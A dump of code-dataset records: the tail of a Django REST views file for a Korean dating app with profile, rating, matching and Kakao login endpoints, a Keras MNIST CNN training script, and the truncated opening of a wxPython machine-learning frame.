상세프로필 수정\n def patch(self, request):\n info = UserInfo.objects.get(user=request.user)\n\n if not info or request.user.status() != 'pass':\n return Response('등록된 프로필 정보가 없거나 가입심사를 합격한 유저가 아닙니다.')\n\n serializer = UserInfoSerializer(info, data=request.data, partial=True)\n\n if serializer.is_valid():\n info = serializer.save()\n\n data = {\n 'info': UserInfoSerializer(info).data\n }\n return Response(data)\n return Response(serializer.errors)\n\n\nclass UserStoryAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n # 해당 유저의 스토리 불러오기\n def get(self, request):\n stories = Story.objects.filter(user=request.user)\n\n if not stories:\n return Response('등록된 스토리가 없습니다.')\n\n serializer = UserStorySerializer(stories, many=True)\n\n data = {\n 'stories': serializer.data,\n }\n return Response(data)\n\n # 해당 유저의 스토리 추가\n def post(self, request):\n serializer = UserStorySerializer(data=request.data)\n user_stories = request.user.story_set.all()\n user_story_numbers = set()\n # 현재 유저가 등록한 스토리 번호 불러와 저장\n for user_story in user_stories:\n user_story_numbers.add(user_story.story)\n\n # POST 요청한 스토리 번호가 이미 등록된 스토리일 경우, response 메시지\n if str(request.data['story']) in user_story_numbers:\n return Response('이미 등록되어있는 스토리 입니다.')\n\n if serializer.is_valid():\n story = serializer.save(user=request.user)\n\n data = {\n 'story': UserStorySerializer(story).data,\n }\n return Response(data)\n return Response(serializer.errors)\n\n # 현재 유저의 등록되어있는 스토리에 접근하여 content 수정\n def patch(self, request):\n story = request.data['story']\n\n user_stories = Story.objects.filter(user=request.user, story=story)\n\n if not user_stories:\n return Response('등록되어있지 않은 스토리 입니다.')\n\n # 아래 코드는 user_stories의 마지막번째를 불러옴\n # 어차피 user_stories는 한 개밖에 없을 것이기 때문에, user_stories[0]을 불러와도 상관은 없을 것임\n serializer = UserStorySerializer(user_stories.last(), data=request.data)\n\n if serializer.is_valid():\n story = serializer.save()\n\n data = {\n 'story': UserStorySerializer(story).data,\n }\n return Response(data)\n return Response(serializer.errors)\n\n # 스토리 삭제하기\n def delete(self, request, pk):\n story = Story.objects.filter(user=request.user, pk=pk)\n\n if story:\n story.delete()\n return Response('해당 스토리가 삭제되었습니다.')\n return Response('해당 스토리의 pk가 존재하지 않습니다.')\n\n\nclass UserRibbonAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n # User별 보유리본 조회\n def get(self, request):\n ribbons = UserRibbon.objects.filter(user=request.user)\n\n # 사실 계정 생성과 동시에 유저의 상태와 상관없이 리본 10개 지급되지만, 내역 없다고 response 설정\n if request.user.status() != 'pass':\n return Response('리본 내역이 없습니다.')\n\n serializer = UserRibbonSerializer(ribbons, many=True)\n\n data = {\n 'ribbonHistory': serializer.data,\n }\n return Response(data)\n\n def post(self, request):\n if request.user.status() != 'pass':\n return Response('가입심사를 합격한 유저가 아닙니다.')\n\n if not Token.objects.filter(user=request.user):\n return Response('인증 토큰이 없는 유저입니다. 로그인이 되어있습니까?')\n\n serializer = UserRibbonSerializer(data=request.data)\n\n # 보유 리본이 부족할 경우 response\n if request.user.userribbon_set.last().current_ribbon + request.data['paidRibbon'] < 0:\n return Response('보유 리본이 부족합니다.')\n\n if serializer.is_valid():\n ribbon = serializer.save(user=request.user)\n\n data = {\n 'ribbon': UserRibbonSerializer(ribbon).data,\n }\n return Response(data)\n return Response(serializer.errors)\n\n\nclass UserPickAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n # 해당 유저에 해 pick한 이성과 pick받은 이성 조회\n def get(self, request):\n pick_from_users = request.user.send_me_pick_users.all()\n pick_to_users = Pick.objects.filter(user=request.user)\n\n # 해당 유저가 pick받은 이성들\n pick_from_list = list()\n for pick_from_user in pick_from_users:\n # pick받은 이성들의 email 정보를 표대시\n pick_from_list.append(pick_from_user.email)\n\n # 해당 유저가 pick한 이성들\n pick_to_list = list()\n for pick_to_user in pick_to_users:\n pick_to_list.append(pick_to_user.partner.email)\n\n data = {\n 'pickFrom': pick_from_list,\n 'pickTo': pick_to_list,\n }\n return Response(data)\n\n # partner에게 pick 주기\n def post(self, request):\n if request.user.status() != 'pass':\n return Response('가입심사를 합격한 유저가 아닙니다.')\n\n # partner의 email 정보를 통해 pk에 접근\n partner = User.objects.get(email=request.data['partner'])\n\n if partner.status() != 'pass':\n return Response('가입심사를 합격한 이성이 아닙니다.')\n\n if request.user in partner.send_me_pick_users.all():\n return Response('이미 pick한 이성 입니다.')\n\n data = {\n 'user': request.user.pk,\n 'partner': partner.pk,\n }\n\n serializer = UserPickSerializer(data=data)\n\n if serializer.is_valid():\n like_true = serializer.save()\n return Response(UserPickSerializer(like_true).data)\n return Response(serializer.errors)\n\n\n# 가입심사 중인 이성 리스트\nclass UserScreeningAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n def get(self, request):\n partners = get_queryset_not_superuser(self, request)\n\n screening_users = list()\n for partner in partners:\n if (partner.status() == 'on_screening') or (partner.status() == 'waiting'):\n screening_users.append(partner.email)\n return Response(screening_users)\n\n\nclass UserStarAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n # 가입심사 보낸 이성과 받은 이성 리스트 및 해당 유저의 평균 별점 조회\n def get(self, request):\n stars_from = request.user.send_me_star_users.all()\n stars_to = Star.objects.filter(user=request.user)\n\n stars_from_list = list()\n for star_from in stars_from:\n # 가입심사 한 이성의 email 값과 이성이 준 별점을 tuple 형태로 추가\n stars_from_list.append(\n (star_from.email, Star.objects.filter(user=star_from, partner=request.user)[0].star)\n )\n\n stars_to_list = list()\n for star_to in stars_to:\n # 가입심사 받은 이성의 email 값과 이성에게 준 별점을 tuple 형태로 추가\n stars_to_list.append(\n (star_to.partner.email, Star.objects.filter(user=request.user, partner=star_to.partner)[0].star)\n )\n\n data = {\n 'starTo': stars_to_list,\n 'starFrom': stars_from_list,\n }\n return Response(data)\n\n def post(self, request):\n if request.user.status() != 'pass':\n return Response('가입심사를 통과한 유저가 아닙니다.')\n\n if not Token.objects.filter(user=request.user):\n return Response('인증 토큰이 없는 유저입니다. 로그인이 되어있습니까?')\n\n # partner의 email 정보를 통해 pk에 접근\n partner = User.objects.get(email=request.data['partner'])\n\n # 넣지 않아도 되는지 확인 필요!\n if partner.status() == 'fail':\n return Response('이미 가입심사를 불합격한 이성입니다.')\n\n star = request.data['star']\n\n if request.user in partner.send_me_star_users.all():\n return Response('이미 가입심사한 이성 입니다.')\n\n data = {\n 'user': request.user.pk,\n 'partner': partner.pk,\n 'star': star,\n }\n\n serializer = UserStarSerializer(data=data)\n\n if serializer.is_valid():\n star = serializer.save()\n return Response(UserStarSerializer(star).data)\n return Response(serializer.errors)\n\n # 가입심사한 이성 재심사 (일단 재심사 안하기로 함)\n # def patch(self, request):\n # if not Token.objects.filter(user=request.user):\n # return Response('인증 토큰이 없는 유저입니다. 로그인이 되어있습니까?')\n #\n # partners = request.user.user_star_set.all()\n # star = request.data['star']\n #\n # for partner in partners:\n # if not partner.partner.email == request.data['partner']:\n # return Response('가입심사한 적 없는 이성입니다.')\n # else:\n # data = {\n # 'user': request.user.pk,\n # 'partner': partner.partner.pk,\n # 'star': star\n # }\n # serializer = UserStarSerializer(partner, data=data)\n #\n # if serializer.is_valid():\n # stars = serializer.save()\n # return Response(UserStarSerializer(stars).data)\n # return Response(serializer.errors)\n\n\nclass UserIdealTypeAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n # 해당 유저의 현재 이상형 설정 정보 조회와 맞춤 이성 소개\n def get(self, request):\n user = request.user\n ideal_type = UserIdealType.objects.filter(user=user)\n\n if not ideal_type:\n return Response('등록된 이상형 정보가 없습니다.')\n\n partners = get_queryset_not_superuser(self, request)\n\n # ideal_partners에 이상형 조건이 (하나라도) 포함된 이성 저장\n ideal_partners = list()\n # 선호지역2가 있어서 나머지 정보는 2번 넣고, 선호지역2만 1번 넣는걸로 일단 설정..\n for partner in partners:\n if user.useridealtype_set.last().age_from and (\n partner.age() >= user.useridealtype_set.last().age_from) and (\n partner.age() <= user.useridealtype_set.last().age_to):\n ideal_partners.append(partner)\n ideal_partners.append(partner)\n print('ideal_partners age >> ', ideal_partners)\n\n if user.useridealtype_set.last().region and (\n partner.userinfo.region == user.useridealtype_set.last().region):\n ideal_partners.append(partner)\n ideal_partners.append(partner)\n print('ideal_partners region >> ', ideal_partners)\n\n if user.useridealtype_set.last().region and (\n partner.userinfo.region == user.useridealtype_set.last().region2):\n ideal_partners.append(partner)\n\n if user.useridealtype_set.last().tall_from and partner.userinfo.tall and (\n partner.userinfo.tall >= user.useridealtype_set.last().tall_from) and (\n partner.userinfo.tall <= user.useridealtype_set.last().tall_to):\n ideal_partners.append(partner)\n ideal_partners.append(partner)\n print('ideal_partners tall >> ', ideal_partners)\n\n if user.useridealtype_set.last().body_shape and (\n partner.userinfo.body_shape == user.useridealtype_set.last().body_shape):\n ideal_partners.append(partner)\n print('ideal_partners body >> ', ideal_partners)\n\n if user.useridealtype_set.last().personality:\n for personality in user.useridealtype_set.last().personality:\n if personality in partner.userinfo.personality:\n ideal_partners.append(partner)\n ideal_partners.append(partner)\n print('ideal_partners personality >> ', ideal_partners)\n\n if user.useridealtype_set.last().religion and (\n partner.userinfo.religion == user.useridealtype_set.last().religion):\n ideal_partners.append(partner)\n ideal_partners.append(partner)\n print('ideal_partners religion >> ', ideal_partners)\n\n if user.useridealtype_set.last().smoking and (\n partner.userinfo.smoking == user.useridealtype_set.last().smoking):\n ideal_partners.append(partner)\n ideal_partners.append(partner)\n print('ideal_partners smoking >> ', ideal_partners)\n\n if user.useridealtype_set.last().drinking and (\n partner.userinfo.drinking == user.useridealtype_set.last().drinking):\n ideal_partners.append(partner)\n ideal_partners.append(partner)\n print('ideal_partners drinking >> ', ideal_partners)\n\n # better_partners에 포함된 이성들의 중복 횟수 저장 (많을수록 better)\n better_partners = dict()\n for ideal_partner in ideal_partners:\n try:\n better_partners[ideal_partner] += 1\n except:\n better_partners[ideal_partner] = 1\n print('better_partners >> ', better_partners)\n\n if better_partners:\n max_count = max(better_partners.values())\n\n # best_partners에 횟수가 가장 많은 이성 저장\n best_partners = list()\n for key, value in better_partners.items():\n if value == max_count:\n best_partners.append(key.email)\n print('best_partners >> ', best_partners)\n\n data = {\n 'idealPartners': best_partners,\n }\n return Response(data)\n else:\n data = {\n 'idealPartners': '없음',\n }\n return Response(data)\n\n # (첫) 이상형 정보 설정\n def post(self, request):\n if not Token.objects.filter(user=request.user):\n return Response('인증 토큰이 없는 유저입니다. 로그인이 되어있습니까?')\n\n if request.user.status() != 'pass':\n return Response('가입심사를 합격한 유저가 아닙니다.')\n\n ideal_type = UserIdealType.objects.filter(user=request.user)\n if ideal_type:\n return Response('이미 등록한 이상형 정보가 있습니다.')\n\n serializer = IdealTypeSerializer(data=request.data, partial=True)\n\n if serializer.is_valid():\n ideal_type = serializer.save(user=request.user)\n data = {\n 'idealTypeInfo': IdealTypeSerializer(ideal_type).data,\n }\n return Response(data)\n return Response(serializer.errors)\n\n # 등���돼 있는 이상형 정보 수정\n def patch(self, request):\n if request.user.status() != 'pass':\n return Response('가입심사를 합격한 유저가 아닙니다.')\n\n if not Token.objects.filter(user=request.user):\n return Response('인증 토큰이 없는 유저입니다. 로그인이 되어있습니까?')\n\n ideal_type = UserIdealType.objects.filter(user=request.user)\n\n if not ideal_type:\n return Response('등록된 이상형 정보가 없습니다.')\n\n # 현재는 기존 저장된 데이터는 수정되지 않으면 그대로 저장되도록 설정 (partial=True)\n serializer = IdealTypeSerializer(ideal_type.last(), data=request.data, partial=True)\n\n if serializer.is_valid():\n ideal_type = serializer.save()\n\n data = {\n 'idealTypeInfo': IdealTypeSerializer(ideal_type).data,\n }\n return Response(data)\n return Response(serializer.errors)\n\n\nclass UserTagAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n # 해당 유저의 모든 관심태그 조회\n def get(self, request):\n if request.user.tag is None:\n request.user.tag = TagType.objects.create()\n request.user.save()\n\n data = {\n 'tags': TagTypeSerializer(request.user.tag).data,\n }\n return Response(data)\n\n # 현재 작동 안됨.! (태그타입별로 api 넣지 않고 한꺼번에 partial update 시도했으나 실패..)\n # def patch(self, request):\n # user = request.user\n # serializer = TagTypeSerializer(data=request.data, partial=True)\n # print('serializer >> ', serializer)\n #\n # if serializer.is_valid():\n # print('valid!')\n # date_style_tags = []\n # life_style_tags = []\n # charm_tags = []\n # relationship_style_tags = []\n #\n # if request.data['dateStyle']:\n # update_date_tags = serializer.validated_data.pop('date_style_tag')\n #\n # for update_date_tag in update_date_tags:\n # date_style_tags.append(Tag.objects.get_or_create(**update_date_tag[0]))\n # print('date_style_tags >> ', date_style_tags)\n # user.date_style_tag.set(date_style_tags)\n #\n # if request.data['lifeStyle']:\n # update_life_tags = serializer.validated_data.pop('life_style_tag')\n #\n # for update_life_tag in update_life_tags:\n # life_style_tags.append(Tag.objects.get_or_create(**update_life_tag[0]))\n # user.life_style_tag.set(life_style_tags)\n # print('life_style_tags >> ', life_style_tags)\n #\n # if request.data['charm']:\n # update_charm_tags = serializer.validated_data.pop('charm_tag')\n #\n # for update_charm_tag in update_charm_tags:\n # charm_tags.append(Tag.objects.get_or_create(**update_charm_tag[0]))\n # user.charm_tag.set(charm_tags)\n # print('charm_tags >> ', charm_tags)\n #\n # if request.data['relationshipStyle']:\n # update_relationship_tags = serializer.validated_data.pop('relathionship_style_tag')\n #\n # for update_relationship_tag in update_relationship_tags:\n # relationship_style_tags.append(Tag.objects.get_or_create(**update_relationship_tag[0]))\n # user.relationship_style_tag.set(relationship_style_tags)\n # print('relationship_style_tags >> ', relationship_style_tags)\n #\n # return Response(TagTypeSerializer(user).data)\n # return Response(serializer.errors)\n\n\nclass UserTagDateStyleAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n # 데이트 스타일 관심태그 추가\n def patch(self, request):\n if not Token.objects.filter(user=request.user):\n return Response('인증 토큰이 없는 유저입니다. 로그인이 되어있습니까?')\n\n serializer = TagTypeSerializer(data=request.data, partial=True)\n\n if serializer.is_valid():\n tags = []\n update_tags = serializer.validated_data.pop('date_style_tag')\n\n for update_tag in update_tags:\n tags.append(Tag.objects.get_or_create(**update_tag)[0])\n\n if request.user.tag is None:\n request.user.tag = TagType.objects.create()\n request.user.save()\n\n request.user.tag.date_style_tag.set(tags)\n return Response(TagTypeSerializer(request.user.tag).data)\n return Response(serializer.errors)\n\n\nclass UserTagLifeStyleAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n # 라이프 스타일 관심태그 수정\n # 기존 등록된 관심태그에서 추가되고 삭제되는 것이 아니라, request.data로 타입별 태그 전체 수정\n def patch(self, request):\n if not Token.objects.filter(user=request.user):\n return Response('인증 토큰이 없는 유저입니다. 로그인이 되어있습니까?')\n\n serializer = TagTypeSerializer(data=request.data, partial=True)\n\n if serializer.is_valid():\n tags = []\n update_tags = serializer.validated_data.pop('life_style_tag')\n\n for update_tag in update_tags:\n tags.append(Tag.objects.get_or_create(**update_tag)[0])\n\n if request.user.tag is None:\n request.user.tag = TagType.objects.create()\n request.user.save()\n\n request.user.tag.life_style_tag.set(tags)\n return Response(TagTypeSerializer(request.user.tag).data)\n return Response(serializer.errors)\n\n\nclass UserTagCharmAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n def patch(self, request):\n if not Token.objects.filter(user=request.user):\n return Response('인증 토큰이 없는 유저입니다. 로그인이 되어있습니까?')\n\n serializer = TagTypeSerializer(data=request.data, partial=True)\n\n if serializer.is_valid():\n tags = []\n update_tags = serializer.validated_data.pop('charm_tag')\n\n for update_tag in update_tags:\n tags.append(Tag.objects.get_or_create(**update_tag)[0])\n\n if request.user.tag is None:\n request.user.tag = TagType.objects.create()\n request.user.save()\n\n request.user.tag.charm_tag.set(tags)\n return Response(TagTypeSerializer(request.user.tag).data)\n return Response(serializer.errors)\n\n\nclass UserTagRelationshipAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n def patch(self, request):\n if not Token.objects.filter(user=request.user):\n return Response('인증 토큰이 없는 유저입니다. 로그인이 되어있습니까?')\n\n serializer = TagTypeSerializer(data=request.data, partial=True)\n\n if serializer.is_valid():\n tags = []\n update_tags = serializer.validated_data.pop('relationship_style_tag')\n\n for update_tag in update_tags:\n tags.append(Tag.objects.get_or_create(**update_tag)[0])\n\n if request.user.tag is None:\n request.user.tag = TagType.objects.create()\n request.user.save()\n\n request.user.tag.relationship_style_tag.set(tags)\n return Response(TagTypeSerializer(request.user.tag).data)\n return Response(serializer.errors)\n\n\n# 테마 소개\nclass UserThemaAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n def get(self, request):\n if request.user.status() != 'pass':\n return Response('가입심사를 합격한 유저가 아닙니다.')\n\n partners = get_queryset_not_superuser(self, request)\n\n # 해당 유저가 여자일 경우, 남자 테마별 이성 소개\n if request.user.gender == '여자':\n neither_drinks_nor_smokes = list()\n four_years_older = list()\n over_180_tall = list()\n church_men = list()\n\n for partner in partners:\n # 술담배를 멀리하는 남자\n if (partner.userinfo.drinking == '마시지 않음') and (partner.userinfo.smoking == '비흡연'):\n neither_drinks_nor_smokes.append(partner.email)\n\n # 성숙한 매력의 4살연상\n if partner.age() == (request.user.age() + 4):\n four_years_older.append(partner.email)\n\n # 키 180cm 이상의 훈남\n if partner.userinfo.tall and (partner.userinfo.tall >= 180):\n over_180_tall.append(partner.email)\n\n # 다정다감한 교회오빠\n if partner.userinfo.religion == '기독교':\n church_men.append(partner.email)\n\n data = {\n 'neitherDrinksNorSmokes': neither_drinks_nor_smokes,\n 'fourYearsOlder': four_years_older,\n 'over180Tall': over_180_tall,\n 'churchMen': church_men,\n }\n return Response(data)\n\n # 해당 유저가 남자일 경우, 여자 테마별 이성 소개\n else:\n over_167_tall = list()\n four_years_younger = list()\n neither_drinks_nor_smokes = list()\n cute_women = list()\n\n for partner in partners:\n # 167cm 이상 큰 키의 그녀\n if partner.userinfo.tall and (partner.userinfo.tall >= 167):\n over_167_tall.append(partner.email)\n\n # 궁합도 안보는 4살연하\n if partner.age() == (request.user.age() - 4):\n four_years_younger.append(partner.email)\n\n # 술담배를 멀리하는 그녀\n if (partner.userinfo.drinking == '마시지 않음') and (partner.userinfo.smoking == '비흡연'):\n neither_drinks_nor_smokes.append(partner.email)\n\n # 귀여운 매력의 그녀\n if '귀여운' in partner.userinfo.personality:\n cute_women.append(partner.email)\n\n data = {\n 'over167Tall': over_167_tall,\n 'fourYearsYounger': four_years_younger,\n 'neitherDrinksNorSmokes': neither_drinks_nor_smokes,\n 'cuteWomen': cute_women,\n }\n return Response(data)\n\n\n# 유저에게 높은 점수를 준 이성(받은 표현)과 유저가 높은 점수를 준 이성(보낸 표현) 리스트 조회\nclass UserExpressionAPIView(APIView):\n permission_classes = [permissions.IsAuthenticated, ]\n\n def get(self, request):\n if request.user.status() != 'pass':\n return Response('가입심사를 합격한 유저가 아닙니다.')\n\n received_partners = request.user.partner_star_set.all()\n sent_partners = request.user.user_star_set.all()\n\n received_high_partners = list()\n for partner in received_partners:\n if partner.star >= 4:\n received_high_partners.append(partner.user.email)\n print('received_high_partners >> ', received_high_partners)\n\n sent_high_partners = list()\n for partner in sent_partners:\n if partner.star >= 4:\n sent_high_partners.append(partner.partner.email)\n print('sent_high_partners >> ', sent_high_partners)\n\n data = {\n 'ReceivedPartners': received_high_partners,\n 'SentPartners': sent_high_partners,\n }\n return Response(data)\n\n\n# 카카오톡 로그인 페이지\ndef KaKaoTemplate(request):\n return render(request, 'kakao.html')\n\n\n# 카카오톡 로그인\nclass KaKaoLoginAPIView(APIView):\n # iOS 부분\n # def get(self, request):\n # app_key = SECRETS['KAKAO_APP_KEY']\n # kakao_access_code = request.GET.get('code', None)\n # url = SECRETS['KAKAO_URL']\n # headers = {\n # 'Content-type': SECRETS['KAKAO_CONTENT_TYPE']\n # }\n #\n # data = {\n # 'grant_type': 'authorization_code',\n # request. 'client_id': app_key,\n # 'redirect_uri': SECRETS['KAKAO_REDIRECT_URI'],\n # 'code': kakao_access_code,\n # }\n #\n # kakao_response = requests.post(url, headers=headers, data=data)\n # return Response(f'{kakao_response.text}')\n\n # 액세스 토큰 받아 가입 혹은 로그인 처리\n def post(self, request):\n access_token = request.data['accessToken']\n gender = request.data['gender']\n me_url = SECRETS['KAKAO_ME_URL']\n me_headers = {\n 'Authorization': f'Bearer {access_token}',\n 'Content-type': SECRETS['KAKAO_CONTENT_TYPE'],\n }\n me_response = requests.get(me_url, headers=me_headers)\n me_response_data = me_response.json()\n print('me_response_data >> ', me_response_data)\n\n # 카카오톡 계정의 이메일로 user의 email 생성\n kakao_email = me_response_data['kakao_account']['email']\n\n if not User.objects.filter(email=kakao_email).exists():\n user = User.objects.create_user(email=kakao_email, gender=gender)\n token = Token.objects.create(user=user)\n else:\n user = User.objects.get(email=kakao_email, gender=gender)\n token, _ = Token.objects.get_or_create(user=user)\n\n # 카카오톡 계정의 고유 id로 user의 username 생성\n # kakao_id = me_response_data['id']\n # kakao_username = f'n_{kakao_id}'\n #\n # if not User.objects.filter(username=kakao_username).exists():\n # user = User.objects.create_user(username=kakao_username)\n # token = Token.objects.create(user=user)\n # else:\n # user = User.objects.get(username=kakao_username)\n # token, _ = Token.objects.get_or_create(user=user)\n\n data = {\n 'user': KakaoUserSerializer(user).data,\n 'token': token.key\n }\n return Response(data)\n","repo_name":"moorekwon/amantha","sub_path":"app/members/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":38727,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70019443771","text":"from __future__ import print_function\n\n#The two folloing lines allow to reduce tensorflow verbosity\nimport os\n\nos.environ['TF_CPP_MIN_LOG_LEVEL']='1' # '0' for DEBUG=all [default], '1' to filter INFO msgs, '2' to filter WARNING msgs, '3' to filter all msgs\n\nimport tensorflow as tf\nimport tensorflow.keras\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Flatten\nfrom tensorflow.keras.optimizers import RMSprop\n\nfrom tensorflow.keras.preprocessing import image\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport os \nimport operator\n\nprint('tensorflow:', tf.__version__)\nprint('keras:', tensorflow.keras.__version__)\n\n##Uncomment the following two lines if you get CUDNN_STATUS_INTERNAL_ERROR initialization errors.\n## (it happens on RTX 2060 on room 104/moneo or room 204/lautrec) \nphysical_devices = tf.config.experimental.list_physical_devices('GPU')\ntf.config.experimental.set_memory_growth(physical_devices[0], True)\n\n\n\n#load (first download if necessary) the MNIST dataset\n# (the dataset is stored in your home direcoty in ~/.keras/datasets/mnist.npz\n# and will take ~11MB)\n# data is already split in train and test datasets\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n# x_train : 60000 images of size 28x28, i.e., x_train.shape = (60000, 28, 28)\n# y_train : 60000 labels (from 0 to 9)\n# x_test : 10000 images of size 28x28, i.e., x_test.shape = (10000, 28, 28)\n# x_test : 10000 labels\n# all datasets are of type uint8\nprint('x_train.shape=', x_train.shape)\nprint('y_test.shape=', y_test.shape)\n\n#To input our values in our network Conv2D layer, we need to reshape the datasets, i.e.,\n# pass from (60000, 28, 28) to (60000, 28, 28, 1) where 1 is the number of channels of our images\nimg_rows, img_cols = x_train.shape[1], x_train.shape[2]\nx_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\nx_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\n\n#Convert to float\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\n\n#Normalize inputs from [0; 255] to [0; 1]\nx_train = x_train / 255\nx_test = x_test / 255\n\nprint('x_train.shape=', x_train.shape)\nprint('x_test.shape=', x_test.shape)\n\nnum_classes = 10\n\n#Convert class vectors to binary class matrices (\"one hot encoding\")\n## Doc : https://keras.io/utils/#to_categorical\ny_train = tensorflow.keras.utils.to_categorical(y_train, num_classes)\ny_test = tensorflow.keras.utils.to_categorical(y_test, num_classes)\n# num_classes is computed automatically here\n# but it is dangerous if y_test has not all the classes\n# It would be better to pass num_classes=np.max(y_train)+1\n\n\n\n#Let start our work: creating a convolutional neural network\n\nmnist_shape= (28,28,1)\nbatch_size = 128\nepochs = 15\n\n\ndef history(history):\n # Plot training & validation accuracy values\n plt.plot(history.history['accuracy'])\n plt.plot(history.history['val_accuracy'])\n plt.title('Model accuracy')\n plt.ylabel('Accuracy')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Test'], loc='upper left')\n plt.show()\n\n # Plot training & validation loss values\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('Model loss')\n plt.ylabel('Loss')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Test'], loc='upper left')\n plt.show()\n\n\n#####TO COMPLETE\ndef CNN_test():\n model = Sequential()\n model.add(Conv2D(7,kernel_size=(5,5),strides=(1,1),padding='same',input_shape=(32,32,3)))\n return model\n\ndef CNN_mnist():\n model = Sequential()\n model.add(Conv2D(32,kernel_size=(3,3),strides=(1,1),padding='same',activation='relu',input_shape = mnist_shape))\n model.add(Conv2D(64,kernel_size=(3,3),strides=(1,1),padding='same',activation='relu'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Dropout(0.3))\n model.add(Flatten())\n model.add(Dropout(0.5))\n model.add(Dense(128,activation='relu'))\n model.add(Dense(num_classes,activation = 'softmax'))\n\n model.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n return model\n\nif(os.path.isfile('mnist_model.h5')):\n mnist=tf.keras.models.load_model('mnist_model.h5')\n print (\"Model found and loaded\")\n\nelse:\n mnist=CNN_mnist()\n fit = mnist.fit(x_train, y_train,batch_size=batch_size,epochs=epochs,verbose=1,validation_data=(x_test, y_test))\n history(fit)\n score = mnist.evaluate(x_test, y_test, verbose=0)\n print('Test loss:', score[0])\n print('Test accuracy:', score[1])\n mnist.save(\"mnist_model.h5\")\n\ny_hat = mnist.predict(x_test)\nplt.figure(figsize=(14,14))\nmin = np.ones((25,2))\n\nclass_names = ['0', '1', '2', '3', '4',\n '5', '6', '7', '8', '9']\n \nfor i in range(y_hat.shape[0]):\n class_test = np.argmax(y_test[i][:])\n class_pred = np.argmax(y_hat[i][:])\n if(class_test != class_pred) :\n for j in range(25) :\n if min[j][0] > y_hat[i][class_pred] :\n min[j][0] = y_hat[i][class_pred]\n min[j][1] = i\n min = sorted(min, key=operator.itemgetter(0), reverse = True)\n break\nmin = sorted(min, key=operator.itemgetter(0))\n\n\nfor i in range(25):\n pic = (int)(min[i][1])\n plt.subplot(5,5,i+1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(x_test[pic], cmap=plt.cm.binary)\n # The CIFAR labels happen to be arrays, \n # which is why you need the extra index\n class_test = np.argmax(y_test[pic][:])\n class_pred = np.argmax(y_hat[pic][:])\n percentage = str(int(y_hat[pic][class_pred]*100))\n plt.xlabel(\"VT : \" + class_names[class_test] + \", Pred : \" + class_names[class_pred] + \" (\" + percentage + \"%)\")\nplt.show()\n","repo_name":"carl-221b/deeplearning","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72982340092","text":"import wx\nimport numpy as np\nfrom sklearn.ensemble import (\n RandomForestRegressor,\n GradientBoostingRegressor,\n RandomForestClassifier,\n GradientBoostingClassifier,\n)\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVR, SVC\nfrom sklearn.tree import DecisionTreeRegressor, DecisionTreeClassifier\nfrom sklearn.neural_network import MLPClassifier, MLPRegressor\nfrom dvha.dialogs.export import save_data_to_file\nfrom dvha.dialogs.main import ShowList\nfrom dvha.options import DefaultOptions\nfrom dvha.paths import MODELS_DIR\nfrom dvha.models.plot import PlotMachineLearning, PlotFeatureImportance\nfrom dvha.tools.utilities import (\n set_msw_background_color,\n get_window_size,\n load_object_from_file,\n set_frame_icon,\n get_selected_listctrl_items,\n)\n\n\nclass MachineLearningFrame(wx.Frame):\n def __init__(\n self,\n main_app_frame,\n data,\n title,\n sklearn_predictor=None,\n alg_type=\"regressor\",\n tool_tips=None,\n include_test_data=True,\n ):\n wx.Frame.__init__(self, None)\n\n self.main_app_frame = main_app_frame\n self.data = data\n self.title = title\n self.sklearn_predictor = [\n sklearn_predictor,\n ALGORITHMS[title][alg_type],\n ][sklearn_predictor is None]\n self.tool_tips = [tool_tips, ALGORITHMS[title][\"tool_tips\"]][\n tool_tips is None\n ]\n self.include_test_data = include_test_data\n\n self.model = None\n is_classifier = alg_type == \"classifier\"\n self.plot = PlotMachineLearning(\n self,\n ml_type=self.title,\n ml_type_short=self.ml_type_short,\n include_test_data=include_test_data,\n is_classifier=is_classifier,\n **self.data\n )\n\n self.feature_importance_dlg = None\n\n self.input = {}\n self.defaults = {}\n self.getters = {}\n\n self.data_split_input = {\n \"test_size\": wx.TextCtrl(self, wx.ID_ANY, \"0.25\"),\n \"train_size\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"random_state\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"shuffle\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"True\", \"False\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n }\n\n self.data_split_defaults = {\n \"test_size\": 0.25,\n \"train_size\": None,\n \"random_state\": None,\n \"shuffle\": True,\n }\n\n self.data_split_getters = {\n \"test_size\": self.to_float_or_none,\n \"train_size\": self.to_float_or_none,\n \"random_state\": 